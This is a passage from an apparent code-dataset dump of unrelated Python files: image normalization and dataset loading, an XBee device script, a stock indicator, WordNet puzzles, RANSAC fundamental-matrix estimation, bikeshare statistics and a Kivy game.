np.ma.MaskedArray(imageA, whitemask)\n imageBM = np.ma.MaskedArray(imageB, whitemask)\n\n ## Sometimes STD is near 0, or 0; add epsilon to avoid div by 0 -NI\n epsilon = 1e-11\n\n imageLMean = imageLM.mean()\n imageLSTD = imageLM.std() + epsilon\n\n imageAMean = imageAM.mean()\n imageASTD = imageAM.std() + epsilon\n\n imageBMean = imageBM.mean()\n imageBSTD = imageBM.std() + epsilon\n\n # normalization in lab\n imageL = (imageL - imageLMean) / imageLSTD * target[0][1] + target[0][0]\n imageA = (imageA - imageAMean) / imageASTD * target[1][1] + target[1][0]\n imageB = (imageB - imageBMean) / imageBSTD * target[2][1] + target[2][0]\n\n imagelab = cv2.merge((imageL, imageA, imageB))\n imagelab = np.clip(imagelab, 0, 255)\n imagelab = imagelab.astype(np.uint8)\n\n # Back to RGB space\n returnimage = cv2.cvtColor(imagelab, cv2.COLOR_LAB2RGB)\n # Replace white pixels\n returnimage[whitemask] = image[whitemask]\n\n return returnimage\n\nclass HistoNormalize(object):\n \"\"\"Normalizes the given PIL.Image\"\"\"\n\n def __call__(self, img):\n img_arr = np.array(img)\n img_norm = normalize(img_arr)\n img = Image.fromarray(img_norm, img.mode)\n return img\n\nclass RandomRotate(object):\n \"\"\"Rotate the given PIL.Image by either 0, 90, 180, 270.\"\"\"\n\n def __call__(self, img):\n random_rotation = np.random.randint(4, size=1)\n if random_rotation == 0:\n pass\n else:\n img = torchvision.transforms.functional.rotate(img, random_rotation*90)\n return img\n\nclass HistoDataNorm(data_utils.Dataset):\n def __init__(self, path, domain_list=[], augmentation=False, normalize=False):\n self.path = path\n self.domain_list = domain_list\n self.augmentation = augmentation\n self.normalize = normalize\n\n\n self.to_tensor = transforms.ToTensor()\n self.resize = transforms.Compose([transforms.Resize(32),\n transforms.CenterCrop(32)])\n self.hflip = transforms.RandomHorizontalFlip()\n self.vflip = transforms.RandomVerticalFlip()\n self.rrotate = RandomRotate()\n self.to_pil = transforms.ToPILImage()\n self.color_norm = HistoNormalize()\n\n self.train_data, self.train_labels, self.train_domains, self.train_yd = self.get_data()\n\n def get_imgs_and_labels(self, domain_path, type, label):\n class_path = domain_path + '/' + type\n all_files = [f for f in os.listdir(class_path) if os.path.isfile(os.path.join(class_path, f))]\n # print(\"allfiles\", len(all_files))\n all_files.sort()\n # if len(all_files)>0:\n # all_files.pop()\n\n if len(all_files) > 0:\n img_list = []\n\n for file_name in all_files:\n file_path = class_path + '/' + file_name\n\n with open(file_path, 'rb') as f:\n with Image.open(f) as img:\n img = img.convert('RGB')\n # print(img)\n if self.normalize:\n img_list.append(self.to_tensor(self.resize(self.color_norm(img))))\n else:\n img_list.append(self.to_tensor(self.resize(img)))\n\n # Concatenate\n imgs = torch.stack(img_list)\n\n # generate labels\n labels = torch.zeros(imgs.size()[0]) + label\n\n else:\n imgs, labels = torch.Tensor(), torch.Tensor()\n\n return imgs, labels.long()\n\n\n def get_data(self):\n # for each domain get all classes\n imgs_per_domain_list = []\n labels_per_domain_list = []\n domain_per_domain_list = []\n\n num_ims=0\n for i, domain in enumerate(self.domain_list):\n domain_path = self.path + domain\n\n # Extract for each class\n #imgs_uninfected, labels_uninfected = self.get_imgs_and_labels(domain_path, 'Uninfected', 0)\n imgs_parasitized, labels_parasitized = self.get_imgs_and_labels(domain_path, 'Parasitized', 1)\n # imgs_complex, labels_complex = self.get_imgs_and_labels(domain_path, '03_COMPLEX', 2)\n # imgs_lympho, labels_lympho = self.get_imgs_and_labels(domain_path, '04_LYMPHO', 3)\n # imgs_debris, labels_debris = self.get_imgs_and_labels(domain_path, '05_DEBRIS', 4)\n # imgs_mucosa, labels_mucosa = self.get_imgs_and_labels(domain_path, '06_MUCOSA', 5)\n # # imgs_adipose, labels_adipose = self.get_imgs_and_labels(domain_path, 'ADIPOSE', 6)\n # # imgs_empty, labels_empty = self.get_imgs_and_labels(domain_path, 'EMPTY', 7)\n\n # stack them per domain\n #imgs_per_domain = torch.cat([imgs_uninfected, imgs_parasitized])\n #labels_per_domain = torch.cat([labels_uninfected, labels_parasitized])\n imgs_per_domain = torch.cat([imgs_parasitized])\n labels_per_domain = torch.cat([labels_parasitized])\n domain_per_domain = torch.zeros(labels_per_domain.size()) + i\n\n # append everything\n imgs_per_domain_list.append(imgs_per_domain)\n labels_per_domain_list.append(labels_per_domain)\n domain_per_domain_list.append(domain_per_domain)\n\n # One last cat\n train_imgs = torch.cat(imgs_per_domain_list)\n train_labels = torch.cat(labels_per_domain_list)\n train_domains = torch.cat(domain_per_domain_list).long()\n\n # Convert to onehot\n\n d = torch.eye(len(self.domain_list))\n train_domains = d[train_domains]\n\n\n\n # yd = torch.eye(len(self.domain_list)*2)\n # train_yd = yd[train_labels*len(self.domain_list) +train_domains]\n\n y = torch.eye(2)\n train_labels = y[train_labels]\n\n train_yd = torch.cat([train_labels,train_domains], dim=1)\n\n return train_imgs, train_labels, train_domains, train_yd\n # return train_imgs, train_labels, train_domains\n\n def __len__(self):\n return len(self.train_labels)\n\n def __getitem__(self, index):\n x = self.train_data[index]\n y = self.train_labels[index]\n d = self.train_domains[index]\n yd = self.train_yd[index]\n \n\n if self.augmentation:\n x = self.to_tensor(self.vflip(self.hflip(self.rrotate(self.to_pil(x)))))\n\n return x, y, d, yd","sub_path":"data_p.py","file_name":"data_p.py","file_ext":"py","file_size_in_byte":7060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"400008362","text":"from time import sleep\nfrom SQL_class import SQLClass\nfrom general_functions import ConvertIntToHex\n\nimport XBee_Threaded\nimport sys\n\nsql = SQLClass()\n\nxbee = XBee_Threaded.XBee(\"/dev/ttyUSB1\")\n\ndef ChangeRoomDevicesPort(rooms_id):\n\tsql.GetWhereQuery(\"rooms\", \"rooms_id={}\".format(rooms_id))\n\tsql.SelectColumn(\"rooms_port, rooms_address\")\n\trooms_result = sql.FetchOne()\n\n\tsql.GetWhereQuery(\"room_devices\", \"rooms_id={}\".format(rooms_id))\n\tsql.SelectColumn(\"room_devices_port\")\n\troom_devices_result = sql.FetchAll()\n\n\tif rooms_result:\n\t\tport_data = \"09 {} {}\".format(ConvertIntToHex(rooms_result[0]), ConvertIntToHex(len(room_devices_result)))\n\t\tfor device_port in room_devices_result:\n\t\t\tport_data = \"{} {}\".format(port_data, ConvertIntToHex(device_port[0]))\n\n\t\tport_data = \"2E {} {}\".format(ConvertIntToHex(len(bytearray.fromhex(port_data))), port_data)\n\n\t\txbee.Send(bytearray.fromhex(port_data), rooms_result[1])\n\n\t\txbee.shutdown()\n\nChangeRoomDevicesPort(sys.argv[1])","sub_path":"Python/FinalV2/ChangeRoomDevicesPort/change_room_devices_port.py","file_name":"change_room_devices_port.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"385468288","text":"import pandas as pd\n\n# cross reference\nfrom datarepository import stockpricerepo\nimport uihelper\n\nfrom indicator import trend_indicator as trendidc, volatility_indicator as volidc\n\n\n# default JC parameters\nDEFAULT_JC_PRAM = {\n 'sma_period':20,\n 'dev_mode':'std',\n 'ema_period':20,\n 'atr_mode':'atr',\n 'atr_period':14,\n 'macd':'12/26/9',\n 'wavebase':8,\n 'wavea':34,\n 'waveb':89,\n 'wavec':233\n }\n\n\"\"\" Live calcualte John Carter TTM Squeeze indicator based on full history adjusted price\n\"\"\"\ndef process_jcsqueeze(symbol, jcpara=DEFAULT_JC_PRAM):\n\n # load stock price\n df = stockpricerepo.get_stock_adjprice(symbol)\n \n # live calculate Bollings Band\n sma, stdev, smpldev = trendidc.process_sma(df.adj_close, jcpara['sma_period'])\n df['bb_middle'] = sma\n if (jcpara['dev_mode'] == 'std'):\n df['bb_upper'] = sma + stdev * 2\n df['bb_lower'] = sma - stdev * 2\n else:\n df['bb_upper'] = sma + smpldev * 2\n df['bb_lower'] = sma - smpldev * 2\n \n # Keltner Channel\n ema = trendidc.process_ema(df.adj_close, jcpara['ema_period'])\n df['kc_middle'] = ema\n if (jcpara['atr_mode']=='atr'):\n atr = volidc.process_atr(df, jcpara['atr_period'])\n df['kc_upper'] = ema + atr * 2\n df['kc_lower'] = ema - atr * 2\n else:\n ematr = volidc.process_ematr(df, jcpara['atr_period'])\n df['kc_upper'] = ema + ematr * 2\n df['kc_lower'] = ema - ematr * 2\n\n # MACD\n macd_periods = jcpara['macd'].split('/')\n emashort = trendidc.process_ema(df.adj_close, int(macd_periods[0]))\n emalong = trendidc.process_ema(df.adj_close, int(macd_periods[1]))\n macd = trendidc.process_macd(emashort, emalong, int(macd_periods[2]))\n df['macd'] = macd\n\n # WAVE A/B/C\n emabase = trendidc.process_ema(df.adj_close, jcpara['wavebase'])\n emawavea = trendidc.process_ema(df.adj_close, jcpara['wavea'])\n emawaveb = trendidc.process_ema(df.adj_close, jcpara['waveb'])\n emawavec = trendidc.process_ema(df.adj_close, jcpara['wavec'])\n\n df['wavea'] = trendidc.process_macd(emabase, emawavea, jcpara['wavea'])\n df['waveb'] = trendidc.process_macd(emabase, emawavea, jcpara['waveb'])\n df['wavec'] = trendidc.process_macd(emabase, emawavea, jcpara['wavec'])\n\n return df\n pass\n\n","sub_path":"Market_Research/data_process/johncarter_squeeze.py","file_name":"johncarter_squeeze.py","file_ext":"py","file_size_in_byte":2303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"360080224","text":" \nimport nltk\nimport random\nnltk.download('wordnet')\n\nfrom nltk.corpus import wordnet as wn\n\ndef synsets_of_mercury():\n synsets = wn.synsets('mercury')\n for synset in synsets:\n print(synset)\n \n\ndef hypernym_chain(synset_name):\n \"\"\"\n e.g. hypernym_chain('boat.n.01')\n \n \"\"\"\n synset = wn.synset(synset_name)\n result = [synset]\n while len(synset.hypernyms()) > 0:\n synset = synset.hypernyms()[0]\n result.append(synset)\n return result\n\ndef get_all_hypernyms_from_sense(sense):\n result = set()\n for y in sense.hypernyms():\n result.add(y)\n for z in get_all_hypernyms_from_sense(y):\n result.add(z)\n return result\n\ndef get_all_hypernyms(word):\n \"\"\"\n e.g. get_all_hypernyms('dog')\n \n \"\"\"\n result = set()\n for x in wn.synsets(word):\n for y in get_all_hypernyms_from_sense(x):\n result.add(y)\n return result\n\ndef get_hyponyms(synset_name):\n \"\"\"\n e.g. get_all_hyponyms('metallic_element.n.01')\n \n \"\"\"\n sense = wn.synset(synset_name)\n return sense.hyponyms()\n\n\ndef get_all_hyponyms_from_sense(sense):\n \"\"\"\n e.g. get_all_hyponyms_from_sense(wn.synset('metallic_element.n.01'))\n \n \"\"\"\n result = set()\n for y in sense.hyponyms():\n result.add(y)\n for z in get_all_hyponyms_from_sense(y):\n result.add(z)\n return result\n\ndef normalize_lemma(lemma):\n lemma = \" \".join(lemma.split(\"_\"))\n lemma = \" \".join(lemma.split(\"-\"))\n lemma = lemma.lower()\n return lemma\n\ndef get_all_lemmas_from_sense(sense):\n result = set()\n for lemma in sense.lemmas():\n result.add(normalize_lemma(lemma.name()))\n for y in get_all_hyponyms_from_sense(sense):\n for lemma in y.lemmas():\n result.add(normalize_lemma(lemma.name()))\n return result \n \n\nclass Specificity:\n def __init__(self):\n self.cache = dict()\n \n def evaluate(self, sense):\n if sense.name() not in self.cache:\n spec = len(get_all_lemmas_from_sense(sense))\n self.cache[sense.name()] = spec\n return self.cache[sense.name()]\n\n\nspecificity = Specificity()\n\n\ndef find_lowest_common_ancestor(words):\n \"\"\"\n find_lowest_common_ancestor(['libertarian', 'green', 'garden', 'democratic'])\n find_lowest_common_ancestor(['apple', 'banana', 'orange', 'grape'])\n \n \"\"\"\n commonHypernyms = get_all_hypernyms(words[0])\n for word in words[1:]:\n commonHypernyms = commonHypernyms & get_all_hypernyms(word)\n if len(commonHypernyms) == 0:\n hyp = wn.synset('entity.n.01')\n return (specificity.evaluate(hyp), hyp)\n scoredHypernyms = [(specificity.evaluate(hyp), hyp) for hyp in commonHypernyms]\n sortedHypernyms = sorted(scoredHypernyms)\n return sortedHypernyms[0]\n\nclass GetRandomSynset:\n def __init__(self, root_synset):\n entity = wn.synset(root_synset)\n self.entity_hyps = get_all_hyponyms_from_sense(entity)\n specificity = Specificity()\n self.specificities = {hyponym: specificity.evaluate(hyponym) for \n hyponym in self.entity_hyps}\n \n\n def __call__(self):\n random_word = random.sample(self.entity_hyps,1)[0]\n return random_word\n \n @staticmethod \n def factory(root_synset):\n return GetRandomSynset(root_synset)\n \n\n def random_synset_with_specificity(self, lower, upper):\n candidates = [hyp for hyp in self.specificities if \n self.specificities[hyp] >= lower and\n self.specificities[hyp] <= upper]\n if len(candidates) > 0:\n return random.choice(candidates)\n else:\n return None\n\n def random_non_hyponym(self, synset_name):\n synset = wn.synset(synset_name)\n hyponyms = get_all_hyponyms_from_sense(synset) | set([synset])\n other_synsets = list(self.entity_hyps - hyponyms)\n assert(len(other_synsets) > 0)\n return random.choice(other_synsets)\n\n\ndef show_puzzles(puzzles):\n score = 0\n num_puzzles_seen = 0\n lives = 100\n #\"puzzle\" variables unshuffled, answer is always at puzzle[4] \n for puzzle in puzzles:\n num_puzzles_seen += 1 \n if lives == 0:\n print(score, num_puzzles_seen)\n print(\"GAME OVER! you got \",100 * score / num_puzzles_seen , \"% correct\")\n return 0\n shuffled_puzzle = puzzle[:]\n random.shuffle(shuffled_puzzle)\n print(\"\\n \\nPUZZLE: \",)\n for word in shuffled_puzzle:\n print(word.name()[:-5])\n print(\"\\n you have \" + str(lives) + \" left.\")\n \n #HUMAN PLAYER\n guess = input(\"Which word is the odd man out? \")\n \n #COMPUTER PLAYER \n #guess = random.choice(puzzle).name()\n \n print(\"\\n YOUR ANSWER: \", guess)\n print(\"\\n CORRECT ANSWER: \", puzzle[4].name()[:-5])\n if (guess == puzzle[4].name()[:-5]):\n print(\"\\n GOOD WORK!\")\n score += 1\n else:\n print(\"\\n INCORRECT\")\n lives -= 1\n\ndef flatness(sense):\n print(get_hyponyms(sense))\n num_direct_children = len(get_hyponyms(sense))\n num_total_children = len(get_all_hyponyms_from_sense(wn.synset(sense)))\n return num_direct_children / num_total_children\n\ndef get_all_hyponyms_from_sense_to_list(sense):\n \"\"\"\n e.g. get_all_hyponyms_from_sense(wn.synset('metallic_element.n.01'))\n \n \"\"\"\n result = []\n for y in sense.hyponyms():\n result.append(y)\n for z in get_all_hyponyms_from_sense(y):\n result.append(z)\n return result\n\n\nclass Repitition:\n def __init__(self):\n self.entity_hypos = self.generate_entity_hypos()\n \n def generate_entity_hypos(self):\n entity = wn.synset(\"entity.n.1\")\n res = [hyp for hyp in get_all_hyponyms_from_sense_to_list(entity)]\n return res\n \n def num_repititions_from_sense(self, sense):\n return self.entity_hypos.count(sense)\n \n# if __name__ == \"__main__\":\n# generate_synset = GetRandomSynset('dog.n.1')\n# test_puzzles = generate_synset.generate_puzzles() \n# print(len(test_puzzles))\n\n ","sub_path":"ozone/wordnet.py","file_name":"wordnet.py","file_ext":"py","file_size_in_byte":6196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"385940854","text":"import numpy as np\nimport math\n\nfrom proj3_code.part2_fundamental_matrix import estimate_fundamental_matrix\n\n\ndef calculate_num_ransac_iterations(\n prob_success: float, sample_size: int, ind_prob_correct: float) -> int:\n \"\"\"\n Calculates the number of RANSAC iterations needed for a given guarantee of\n success.\n\n Args:\n prob_success: float representing the desired guarantee of success\n sample_size: int the number of samples included in each RANSAC\n iteration\n ind_prob_success: float representing the probability that each element\n in a sample is correct\n\n Returns:\n num_samples: int the number of RANSAC iterations needed\n\n \"\"\"\n num_samples = None\n ###########################################################################\n ###########################################################################\n e = 1-ind_prob_correct\n num_samples = np.log((1-prob_success)) / np.log(1-np.power(1-e, sample_size))\n\n # raise NotImplementedError('`calculate_num_ransac_iterations` function ' +\n # 'in `ransac.py` needs to be implemented')\n\n ###########################################################################\n # END OF YOUR CODE #\n ###########################################################################\n\n return int(num_samples)\n\n\ndef ransac_fundamental_matrix(\n matches_a: np.ndarray, matches_b: np.ndarray) -> np.ndarray:\n \"\"\"\n For this section, use RANSAC to find the best fundamental matrix by\n randomly sampling interest points. You would reuse\n estimate_fundamental_matrix() from part 2 of this assignment and\n calculate_num_ransac_iterations().\n\n If you are trying to produce an uncluttered visualization of epipolar\n lines, you may want to return no more than 30 points for either left or\n right images.\n\n Tips:\n 0. You will need to determine your prob_success, sample_size, and\n ind_prob_success values. What is an acceptable rate of success? How\n many points do you want to sample? What is your estimate of the\n correspondence accuracy in your dataset?\n 1. A potentially useful function is numpy.random.choice for creating\n your random samples.\n 2. You will also need to choose an error threshold to separate your\n inliers from your outliers. We suggest a threshold of 0.1.\n\n Args:\n matches_a: A numpy array of shape (N, 2) representing the coordinates\n of possibly matching points from image A\n matches_b: A numpy array of shape (N, 2) representing the coordinates\n of possibly matching points from image B\n Each row is a correspondence (e.g. row 42 of matches_a is a point that\n corresponds to row 42 of matches_b)\n\n Returns:\n best_F: A numpy array of shape (3, 3) representing the best fundamental\n matrix estimation\n inliers_a: A numpy array of shape (M, 2) representing the subset of\n corresponding points from image A that are inliers with respect to\n best_F\n inliers_b: A numpy array of shape (M, 2) representing the subset of\n corresponding points from image B that are inliers with respect to\n best_F\n \"\"\"\n ###########################################################################\n ###########################################################################\n\n threshold = 0.1\n prob_success = 0.99\n sample_size = 8\n ind_prob_success = 0.55\n\n num_samples = calculate_num_ransac_iterations(prob_success, sample_size, ind_prob_success)\n\n F_list = np.empty((3,3,num_samples))\n # inliers_list = np.empty((num_samples))\n best_F = np.zeros((3,3))\n inliers_a = np.zeros((1,2))\n inliers_b = np.zeros((1,2))\n # best_inliers = np.array([])\n most_inliers = 0\n max_loss = np.inf\n for i in range(0, num_samples):\n\n # sample points\n matches_combined = np.append(matches_a, matches_b,axis=1)\n # matches_sampled = np.random.choice(matches_combined, size=sample_size, replace=False)\n matches_indices = np.arange(0,matches_combined.shape[0])\n matches_sampled_ind = np.random.choice(matches_indices, sample_size, replace=False)\n matches_indices_left = np.delete(matches_indices, matches_sampled_ind)\n # matches_sampled = matches_combined[np.random.choice(matches_combined.shape[0], sample_size, replace=False), :]\n matches_sampled = matches_combined[matches_sampled_ind, :]\n matches_left = matches_combined[matches_indices_left, :]\n matches_sampled_a = matches_sampled[:,0:2]\n matches_sampled_b = matches_sampled[:,2:4]\n\n matches_left_a = matches_left[:,0:2]\n matches_left_b = matches_left[:,2:4]\n\n F = estimate_fundamental_matrix(matches_sampled_a, matches_sampled_b)\n F_list[:,:,i] = F.copy()\n\n # TO FIND INLIERS RUN ON ALL OTHER POINTS AND CHECK IF WITHIN THRESHOLD\n # matches_test = matches_combined.copy()\n # matches_test_a = matches_test[:,2:4]\n # matches_test_b = matches_test[:,0:2]\n\n inliers = []\n residuals = []\n for j in range(0, matches_left_a.shape[0]):\n r = np.append(matches_left_a[j, :], 1)\n l = np.append(matches_left_b[j, :], 1)\n # error = np.transpose(l) @ F @ r\n # use equation 13 from \"Deep Fundamental Matrix Estimation\"\n residual = np.abs(np.transpose(l) @ F @ r) * \\\n (1/np.linalg.norm(F.transpose() @ l, 2) + 1/np.linalg.norm(F @ r, 2))\n if residual < threshold:\n inliers.append(j)\n residuals.append(residual)\n\n # # MOST INLIERS!\n # if np.size(inliers) > most_inliers:\n # # best_inliers = inliers.copy()\n # inliers_a = matches_left_a[inliers, :]\n # inliers_b = matches_left_b[inliers, :]\n # # best_inliers = np.array([[inliers_a], [inliers_b]])\n # best_F = F.copy()\n # most_inliers = np.size(inliers)\n\n # MIN LOSS FUNCTIONS\n if np.size(inliers) < 1:\n continue\n loss = np.sum(residuals) / np.size(inliers)\n if loss < max_loss:\n inliers_a = matches_left_a[inliers, :]\n inliers_b = matches_left_b[inliers, :]\n best_F = F.copy()\n max_loss = loss\n\n # raise NotImplementedError('`ransac_fundamental_matrix` function in ' +\n # '`ransac.py` needs to be implemented')\n\n ###########################################################################\n # END OF YOUR CODE #\n ###########################################################################\n\n return best_F, inliers_a, inliers_b\n","sub_path":"proj3/proj3_code/part3_ransac.py","file_name":"part3_ransac.py","file_ext":"py","file_size_in_byte":6860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"453086706","text":"from solutions.common.file_reader import FileReader\nfrom solutions.day18.math_expression_parser import MathExpressionParser\n\nif __name__ == '__main__':\n puzzle_input = FileReader.to_line_list(\"input.txt\")\n operators_by_priority = {1: ['+', '*']}\n expression_parser = MathExpressionParser(operators_by_priority)\n parsed_expressions = list(map(lambda line: expression_parser.parse(line), puzzle_input))\n evaluated_expressions = list(map(lambda expression: expression.evaluate(), parsed_expressions))\n print(\"[PART 1] Sum of expressions evaluation results: {}\".format(sum(evaluated_expressions)))\n","sub_path":"solutions/day18/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"577418536","text":"import time\nimport pandas as pd\nimport numpy as np\nimport csv\n\nCITY_DATA = { 'chicago': 'chicago.csv',\n 'new york city': 'new_york_city.csv',\n 'washington': 'washington.csv' }\n\nCITIES = ['chicago', 'new york city', 'washington']\n\nMONTHS = ['january', 'february', 'march', 'april', 'may', 'june']\n\nDAYS = ['monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday']\n\ndef get_user_input(message, user_list):\n \"\"\"\n An utility function to obtain user specific input value\n Args:\n (str) message - an information message for a particular request\n Returns:\n (str) user_data - requested data from user\n \"\"\"\n\n while True:\n user_data = input(message).lower()\n if user_data in user_list:\n break\n if user_data == 'all':\n break\n \n return user_data\n\n\ndef get_filters():\n \"\"\"\n Asks user to specify a city, month, and day to analyze.\n\n Returns:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n \"\"\"\n print('Hello! Let\\'s explore some US bikeshare data!')\n\n # get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle invalid inputs\n while True:\n city = input('Which city do you want to explore? Chicago, New York City or Washington? \\n> ').lower()\n if city in CITIES:\n break\n\n # get user input for month (all, january, february, ... , june)\n month = get_user_input('Okay, Which month? Or \\'all\\'? \\n> ', MONTHS)\n\n # get user input for day of week (all, monday, tuesday, ... sunday)\n day = get_user_input('Annnnnd which day in week? \\n> ', DAYS)\n\n print('-'*40)\n return city, month, day\n\n\ndef load_data(city, month, day):\n \"\"\"\n Loads data for the specified city and filters by month and day if applicable.\n\n Args:\n (str) city - name of the city to analyze\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\n Returns:\n df - Pandas DataFrame containing city data filtered by month and day\n \"\"\"\n\n df = pd.read_csv(CITY_DATA[city])\n df['Start Time'] = pd.to_datetime(df['Start Time'])\n df['month'] = df['Start Time'].dt.month\n df['day_of_week'] = df['Start Time'].dt.weekday_name\n df['hour'] = df['Start Time'].dt.hour\n if month != 'all':\n month = MONTHS.index(month) + 1\n df = df[ df['month'] == month ]\n if day != 'all':\n df = df[ df['day_of_week'] == day.title()]\n\n return df\n\n\ndef time_stats(df):\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\n\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\n start_time = time.time()\n\n most_common_month = df['month'].value_counts().idxmax()\n print(\"The most common month is :\", most_common_month)\n print()\n most_common_day_of_week = df['day_of_week'].value_counts().idxmax()\n print(\"The most common day of week is :\", most_common_day_of_week)\n print()\n most_common_start_hour = df['hour'].value_counts().idxmax()\n print(\"The most common start hour is :\", most_common_start_hour)\n print()\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef station_stats(df):\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\n\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\n start_time = time.time()\n\n most_common_start_station = df['Start Station'].value_counts().idxmax()\n print(\"The most commonly used start station:\", most_common_start_station)\n print()\n most_common_end_station = df['End Station'].value_counts().idxmax()\n print(\"The most commonly used end station:\", most_common_end_station)\n print()\n most_frequent_start_end = df.groupby(['Start Station', 'End Station'])['Start Time'].count().sort_values(ascending=False).index[0]\n print(\"The most frequent combination of start station and end station trip: {}, {}\".format(most_frequent_start_end[0], most_frequent_start_end[1]))\n print()\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef trip_duration_stats(df):\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\n\n print('\\nCalculating Trip Duration...\\n')\n start_time = time.time()\n\n total_travel = df['Trip Duration'].sum()\n print(\"Total travel time :\", total_travel)\n print()\n mean_travel = df['Trip Duration'].mean()\n print(\"Mean travel time :\", mean_travel)\n print()\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\n\ndef user_stats(df):\n \"\"\"Displays statistics on bikeshare users.\"\"\"\n\n print('\\nCalculating User Stats...\\n')\n start_time = time.time()\n\n print(\"Counts of user types:\\n\")\n user_counts = df['User Type'].value_counts()\n for index, user_count in enumerate(user_counts):\n print(\" {}: {}\".format(user_counts.index[index], user_count))\n print()\n\n if 'Gender' in df.columns:\n print(\"Counts of gender:\\n\")\n gender_counts = df['Gender'].value_counts()\n for index,gender_count in enumerate(gender_counts):\n print(\" {}: {}\".format(gender_counts.index[index], gender_count))\n print()\n\n if 'Birth Year' in df.columns:\n birth_year = df['Birth Year']\n earliest_year = birth_year.min()\n print(\"The earliest birth year:\", earliest_year)\n most_common_year = birth_year.value_counts().idxmax()\n print(\"The most common birth year:\", most_common_year)\n most_recent = birth_year.max()\n print(\"The most recent birth year:\", most_recent)\n print()\n\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\n print('-'*40)\n\ndef display_data(city):\n \"\"\"\n Another change.\n Displays five lines of raw data if the user specifies that they would like to.\n After displaying five lines, ask the user if they would like to see five more,\n continuing asking until they say stop.\n This is the additional change.\n \"\"\"\n\n with open(CITY_DATA[city]) as f:\n reader = csv.reader(f)\n rows = [r for r in reader]\n index = 1\n while True:\n will_see = input('\\nWould you like to see some raw data? Enter yes or no.\\n').lower()\n if will_see != 'yes':\n break\n for _ in range(5):\n print(rows[index])\n index += 1\n\n print('-'*40)\n\n\ndef main():\n while True:\n city, month, day = get_filters()\n df = load_data(city, month, day)\n\n display_data(city)\n time_stats(df)\n station_stats(df)\n trip_duration_stats(df)\n user_stats(df)\n\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\n if restart.lower() != 'yes':\n break\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":7121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"285233729","text":"from kivy.app import App\r\nfrom kivy.core.window import Window\r\nfrom kivy.core.audio import SoundLoader\r\nfrom kivy.core.text import Label as CoreLabel\r\nfrom kivy.uix.widget import Widget\r\nfrom kivy.properties import NumericProperty, ReferenceListProperty, ObjectProperty, ListProperty, StringProperty\r\nfrom kivy.uix.screenmanager import ScreenManager, Screen\r\nfrom kivy.vector import Vector\r\nfrom kivy.clock import Clock\r\nfrom random import randint\r\nfrom kivy.config import Config\r\nfrom sys import platform\r\nimport serial, time, pickle, datetime #, winsound\r\nfrom numpy import binary_repr\r\nimport struct\r\nimport time\r\nimport numpy as np\r\nimport tables\r\n\r\n\r\nConfig.set('kivy', 'exit_on_escape', 1)\r\nConfig.set('graphics', 'resizable', False)\r\nif platform == 'darwin':\r\n fixed_window_size = (1800, 1000)\r\nelif platform == 'win32':\r\n fixed_window_size = (1800, 1000)\r\npix_per_cm = 85.\r\nConfig.set('graphics', 'width', str(fixed_window_size[0]))\r\nConfig.set('graphics', 'height', str(fixed_window_size[1]))\r\n\r\nclass Data(tables.IsDescription):\r\n state = tables.StringCol(24) # 24-character String\r\n cursor = tables.Float32Col(shape=(10, 2))\r\n cursor_ids = tables.Float32Col(shape = (10, ))\r\n set_ix = tables.Float32Col(shape=(1, ))\r\n cap_touch = tables.Float32Col()\r\n time = tables.Float32Col()\r\n\r\nclass SequenceGame(Widget):\r\n target1 = ObjectProperty(None)\r\n target2 = ObjectProperty(None)\r\n button1_in = ObjectProperty(None)\r\n button1_out = ObjectProperty(None)\r\n button2_in = ObjectProperty(None)\r\n button2_out = ObjectProperty(None)\r\n button3_in = ObjectProperty(None)\r\n button3_out = ObjectProperty(None)\r\n button4_in = ObjectProperty(None)\r\n button4_out = ObjectProperty(None)\r\n button5_in = ObjectProperty(None)\r\n button5_out = ObjectProperty(None)\r\n button6_in = ObjectProperty(None)\r\n button6_out = ObjectProperty(None)\r\n button7_in = ObjectProperty(None)\r\n button7_out = ObjectProperty(None)\r\n button8_in = ObjectProperty(None)\r\n button8_out = ObjectProperty(None)\r\n button9_in = ObjectProperty(None)\r\n button9_out = ObjectProperty(None)\r\n button10_in = ObjectProperty(None)\r\n button10_out = ObjectProperty(None)\r\n button11_in = ObjectProperty(None)\r\n button11_out = ObjectProperty(None)\r\n button12_in = ObjectProperty(None)\r\n button12_out = ObjectProperty(None)\r\n button13_in = ObjectProperty(None)\r\n button13_out = ObjectProperty(None)\r\n button14_in = ObjectProperty(None)\r\n button14_out = ObjectProperty(None)\r\n button15_in = ObjectProperty(None)\r\n button15_out = ObjectProperty(None)\r\n button16_in = ObjectProperty(None)\r\n button16_out = ObjectProperty(None)\r\n \r\n # Time to wait after starting the video before getting to the first set display\r\n pre_start_vid_ts = 0.1\r\n \r\n # 